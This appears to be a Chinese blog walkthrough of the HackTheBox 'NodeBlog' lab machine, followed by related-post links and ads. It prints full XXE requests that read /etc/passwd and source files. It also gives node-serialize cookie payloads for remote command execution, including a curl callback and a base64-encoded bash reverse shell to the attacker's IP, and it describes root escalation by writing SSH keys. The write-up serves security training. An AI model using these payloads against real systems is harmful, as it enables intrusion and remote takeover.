HackTheBox | NodeBlog

原创 于 2023-01-12 11:20:11 发布 · 258 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章描述了一次针对Node.js应用的渗透测试过程,发现了XXE漏洞,通过构造XML实体读取了系统文件。进一步利用反序列化漏洞尝试执行命令,最终实现了远程命令执行(RCE)。虽然无回显,但能通过反弹shell获取信息。通过密码和sudo权限,可以读取特定文件并利用SSH登录。

HackTheBox | NodeBlog

nmap扫描,开启22、5000,其中5000端口的web服务使用node.js开发

image-20230111155456699

访问Web服务

image-20230111155556389

存在登录页面

image-20230111160049345

sqlmap跑一下,没有发现注入点

image-20230111161908078

dirsearch扫描,也只有login页面

image-20230111161938921

尝试手动信息收集,发现存在articles路径

image-20230111162003920

再用dirsearch对articles路径扫描一下,扫到了/articles/new/articles/test两个路径

image-20230111162930327

new页面用于创建新文章

image-20230111163037929

image-20230111163126890

test页面是已经创建好的test文章

image-20230111163111456

回到主页面,检查源代码,看到了js代码,对/articles/xml进行了请求

image-20230111163430189

POST请求访问该页面,看到返回信息中要求了格式

image-20230111163651928

尝试POST内容,还是格式不对

image-20230111171052726

构造一个标准的文件上传请求包,看到发送的XML内容被写入文本框中

POST /articles/xml HTTP/1.1
Host: 10.10.11.139:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d8a-Q5hbhgQT0KLPhY8od1GY18/i7BA"
Content-Type: multipart/form-data; boundary=---------------------------34916364483540329092468948094
Content-Length: 379

-----------------------------34916364483540329092468948094
Content-Disposition: form-data; name="file"; filename="123.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?> 
<post><title>Example Post</title><description>Example Description</description><markdown>Example Markdown</markdown></post>

-----------------------------34916364483540329092468948094--

image-20230111173653689

进行XXE文件读取

POST /articles/xml HTTP/1.1
Host: 10.10.11.139:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d8a-Q5hbhgQT0KLPhY8od1GY18/i7BA"
Content-Type: multipart/form-data; boundary=---------------------------34916364483540329092468948094
Content-Length: 433

-----------------------------34916364483540329092468948094
Content-Disposition: form-data; name="file"; filename="123.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [ 
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
<post><title>Example Post</title><description>Example Description</description><markdown>&xxe;</markdown></post>

-----------------------------34916364483540329092468948094--

image-20230111174239756

看到用户admin

image-20230111174312769

之前访问错误的时候回显报错时得到一些路径

image-20230111174740703

读取server.js的源码

image-20230111175240367

const express = require('express')
const mongoose = require('mongoose')
const Article = require('./models/article')
const articleRouter = require('./routes/articles')
const loginRouter = require('./routes/login')
const serialize = require('node-serialize')
const methodOverride = require('method-override')
const fileUpload = require('express-fileupload')
const cookieParser = require('cookie-parser');
const crypto = require('crypto')
const cookie_secret = "UHC-SecretCookie"
//var session = require('express-session');
const app = express()

mongoose.connect('mongodb://localhost/blog')

app.set('view engine', 'ejs')
app.use(express.urlencoded({ extended: false }))
app.use(methodOverride('_method'))
app.use(fileUpload())
app.use(express.json());
app.use(cookieParser());
//app.use(session({secret: "UHC-SecretKey-123"}));

function authenticated(c) {
    if (typeof c == 'undefined')
        return false

    c = serialize.unserialize(c)

    if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){
        return true
    } else {
        return false
    }
}


app.get('/', async (req, res) => {
    const articles = await Article.find().sort({
        createdAt: 'desc'
    })
    res.render('articles/index', { articles: articles, ip: req.socket.remoteAddress, authenticated: authenticated(req.cookies.auth) })
})

app.use('/articles', articleRouter)
app.use('/login', loginRouter)


app.listen(5000)

看到对参数c进行了反序列化操作。在get()中看到c其实就是请求中cookie字段的auth值。

查找之后node-serialize应该是node的一个标准模块,参考https://paper.seebug.org/213/生成反序列化payload

var y={
        rce:function(){
                require('child_process').exec('ls /', function(error, stdout, stderr){console.log(stdout)});
        },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

image-20230112102106887

由于需要调用反序列化函数,所以需要使用到(),最后得到的payload如下:

{"rce":"_$$ND_FUNC$$_function(){\r\nrequire('child_process').exec('ls /', function(error, stdout, stderr){console.log(stdout)});}()"}

将其添加到HTTP请求的Cookie字段,此时是尝试读取文件列表,但是没有成功

image-20230112102331708

尝试curl本地,发现成功,所以应该是无回显RCE

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('curl 10.10.16.5:1234', function(error, stdout, stderr){console.log(stdout)});}()"}

image-20230112103546130

那么就修改payload反弹shell

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzEyMzQgMD4mMQ==|base64 -d|bash -i', function(error, stdout, stderr){console.log(stdout)});}()"}

拿到之前看到的admin用户的权限

image-20230112103810927

进入/home/admin目录时提示无权限

image-20230112105545923

上传linenum.sh和linpeas.sh进行信息收集,但是没有看到有效信息

手动信息收集,当前主机开放了mongodb,进入node的web服务看看能不能找到一些密码。

/opt/blog/routes/login.js找到admin的密码admin/IppsecSaysPleaseSubscribe

image-20230112105650977

尝试ssh登录,发现只允许公钥

image-20230112105759343

sudo -l检查sudo权限

image-20230112105845943

发现可以读取/home/admin目录下的文件,但是没法进入该目录,提示没有cd命令,应该是做了权限限制

同样也可以sudo读取root用户的文件

image-20230112110244683

既然可以操作/root用户的文件,就想到可以写公钥进去

但是在写的过程中发现无法直接写入authorized_keys,会提示权限不足

尝试先在其他目录创建一个authorized_keys文件,然后移动到/root/.ssh目录下,再将文件的属主、属组修改为root,将文件权限修改为600,此时就可以利用SSH公钥登录root用户。

image-20230112111500690

image-20230112111517624

本地SSH登录

image-20230112111202804

hackthebox-node(考点:node.js/ubantu提权)
冬萍子癸水
04-12 615
nmap 只有3000端口可以利用,http://10.10.10.58:3000 进去看没什么有价值的,dirbuster扫也扫不出来啥。这个时候可以用ctrl+u进去,查看js里的登录信息或者burp抓一下,看有何发现。 发现api/users 再用这个路径进http看。 就出来了账号信息,很明显第一个就是管理员 那个管理员的密码MD5或hash,并不复杂,就是单纯的字母数字,这种我习惯...
HTB靶场系列 linux靶机 Node靶机
m0_57221101的博客
01-13 1912
勘探 nmap > nmap 10.10.10.58 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 10:58 EDT Nmap scan report for 10.10.10.58 Host is up (0.31s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp Nmap
Hack the box靶机 Node
菜浪马废的博客
05-20 432
dirb不能扫描 但是把bp开开 有很多信息 myP14ceAdm1nAcc0uNT:manchester 找到账号 登录看看 下载文件 解码 是一个压缩包 而且有密码 破解密码 昨天家里停电 虚拟机损毁 今天重下的 忘了没有fcrackzip mark:5AYRft73VtFpc84k 应该是账号 试试ssh 看来没错了 我需要tom用户的账号啊 看看tom的进程 看一下walkthrough 不会了 国外的实在是看不明白怎么操作的 国内的全是内核提权 倒是简单 算了 内核提权 .
精选资源
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
精选资源
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能
06-22
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能的学生。它提供了一个安全且合法的环境,让参与者能够实践他们的黑客技能,而不必担心法律...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
精选资源
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
精选资源
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8857
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
labview录音程序实现
01-02
代码下载地址: https://pan.quark.cn/s/a4b39357ea24 labview2018-tutorial Author: Zhiqiang Yuan this repository tells how to use LabVIEW based on labview2018. Environment: LabVIEW2018 PS: This is the source code of labview2018 course of https://www.51zxw.net/list.aspx?cid=757 , because of the copyright of this net, so I have to put the source code here. You can watch the whole movie course in the link above. If you have any problem ,you can send me an email: yuanzhiqiang@sina.cn Thanks for your attention.
基于计算机网络核心概念与实践技能的综合学习与实验平台项目_该项目专注于通过系统化教学模块与动手实验相结合的方式深入讲解并实践计算机网络的基础理论协议分析网络配置与安全扫描等关.zip
01-02
基于计算机网络核心概念与实践技能的综合学习与实验平台项目_该项目专注于通过系统化教学模块与动手实验相结合的方式深入讲解并实践计算机网络的基础理论协议分析网络配置与安全扫描等关.zip
阿里云函数计算FC数据库连接与操作Python示例项目集_包含MySQL_Redis_MongoDB_SQLServer_PostgreSQL_Lindorm等多种数据库的完整连接.zip
01-02
阿里云函数计算FC数据库连接与操作Python示例项目集_包含MySQL_Redis_MongoDB_SQLServer_PostgreSQL_Lindorm等多种数据库的完整连接.zip
基于Cisco_Packet_Tracer仿真平台构建的包含一个DHCP服务器与一个DNS服务器的综合网络服务配置实验项目_该项目详细演示了如何在Cisco_Packet_Trac.zip
01-02
基于Cisco_Packet_Tracer仿真平台构建的包含一个DHCP服务器与一个DNS服务器的综合网络服务配置实验项目_该项目详细演示了如何在Cisco_Packet_Trac.zip
路径规划基于蜣螂优化算法(DBO)优化路径规划研究(Matlab代码实现)
01-02
【路径规划】基于蜣螂优化算法(DBO)优化路径规划研究(Matlab代码实现)内容概要:本文介绍了基于蜣螂优化算法(DBO)的路径规划研究,通过Matlab代码实现,旨在利用DBO算法解决路径规划问题。文中详细阐述了算法的原理及其在路径规划中的应用,展示了如何通过智能优化算法寻找最优路径,适用于复杂环境下的路径优化需求。同时,文档提到了该研究属于一系列智能优化算法应用的一部分,涵盖多个科研领域的MATLAB仿真服务,如生产调度、电力系统、图像处理等。; 适合人群:具备一定编程基础,熟悉Matlab软件操作,对智能优化算法及路径规划感兴趣的科研人员和研究生。; 使用场景及目标:①应用于无人机、机器人等自动化设备的三维路径规划;②解决物流配送、自动驾驶等领域内的路径优化问题;③为学术研究提供一种新的智能优化算法实现思路与实践案例。; 阅读建议:建议读者结合Matlab代码进行实际操作,深入理解蜣螂优化算法的工作机制,并尝试将其应用于不同的路径规划场景中,以提高算法的实际应用能力。同时,可参考文档中提供的其他资源链接,获取更多相关技术和工具支持。
3D生存游戏套件.zip
最新发布
01-02
3D生存游戏套件
Mac charles问题及解决
01-02
本文详细阐述了在Mac操作系统环境下运用Charles工具所遭遇的各类挑战及其对应的解决方案。 根据原作 https://pan.quark.cn/s/23ec416fc469 的源码改编 这些内容具有较高的借鉴意义,接下来请跟随我们的指引进行深入探讨。
基于大学服务器机房实践环境自主构建与深度探索的计算机网络全栈配置诊断与协议分析实战演练项目_涵盖Wireshark网络流量抓包与TCP三次握手机制深度解析路由器与交换机硬件组网.zip
01-02
基于大学服务器机房实践环境自主构建与深度探索的计算机网络全栈配置诊断与协议分析实战演练项目_涵盖Wireshark网络流量抓包与TCP三次握手机制深度解析路由器与交换机硬件组网.zip
【单片机开发项目实战】相关内容:调试与量产指南:J-Link调试技巧、电源噪声排查、固件批量烧录、EMC测试注意事项
01-02
【单片机开发项目实战】相关内容:调试与量产指南:J-Link调试技巧、电源噪声排查、固件批量烧录、EMC测试注意事项。
【机器人开发】相关内容:仿真与实机调试:Gazebo仿真环境搭建、URDF模型编写、实机传感器标定、多机通信(ROS多机)
01-02
【机器人开发】相关内容:仿真与实机调试:Gazebo仿真环境搭建、URDF模型编写、实机传感器标定、多机通信(ROS多机)。
Hack The Box:File Inclusion 漏洞深度剖析与实战解析
"这篇文档是关于Hack The Box平台上的File Inclusion漏洞利用的实战教程,主要涉及了Local File Inclusion(LFI)的概念、原因以及如何进行漏洞探测和利用。" 在网络安全领域,Local File Inclusion(LFI)是一种...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值